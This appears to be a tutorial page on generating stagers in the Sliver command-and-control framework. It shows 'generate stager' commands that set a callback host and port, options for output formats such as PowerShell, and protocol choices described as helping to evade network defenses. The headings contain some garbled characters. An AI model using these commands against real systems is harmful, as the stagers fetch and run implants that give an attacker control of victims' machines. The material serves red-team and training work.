π Stagers β
Stagers in Sliver (C2) are small pieces of shellcode designed to set up a communication channel between a compromised machine and the C2 server. They are used as the initial payload that, once executed on the target machine, downloads and executes a more substantial implant or payload. Stagers are essential for establishing an initial foothold in a target environment.
π What are Stagers ? β
Stagers are lightweight payloads that create the initial communication link between the compromised endpoint and the C2 server. Their primary function is to download and execute the full implant, allowing the operator to maintain control over the target system. Due to their small size, stagers can be easily injected into vulnerable applications or delivered through various exploit mechanisms.
π§ Setting Up Stagers β
To generate a stager in Sliver, you use the generate stager command. This command creates a shellcode that can be deployed on target machines to establish a connection with the C2 server.
- Basic Stager Generation (HTTP) :
generate stager --arch amd64 --os windows --protocol http --lhost 10.10.10.10 --lport 9000 --save ./custom_stager.binThis basic command sets up a stager with the following parameters :
--arch: Specifies the CPU architecture.--os: Specifies the operating system.--protocol: Sets the staging protocol, such as TCP, HTTP, or HTTPS.--lhost: Specifies the listening host IP address.--lport: Specifies the listening port.--save: Defines the path to save the generated stager.
βοΈ Key Configuration Options β
1. Bad Characters (--badchars) : β
This option allows you to specify bytes that should be excluded from the stager shellcode. This is particularly useful to avoid null bytes or other characters that might cause issues in certain exploit environments.
generate stager --badchars '00'2. Output Format (--format) : β
The stager can be output in various formats to suit different use cases and integration scenarios. Available formats include raw shellcode, bash, C, C#, PowerShell, Python, and more.
generate stager --format ps13. Staging Protocol (--protocol) : β
The staging protocol defines how the stager communicates with the C2 server. Options include TCP, HTTP, and HTTPS. Choosing the right protocol can help evade network defenses and blend in with normal traffic.
generate stager --protocol https4. Timeout Details : β
The --timeout option sets the command timeout in seconds, ensuring that the stager does not hang indefinitely.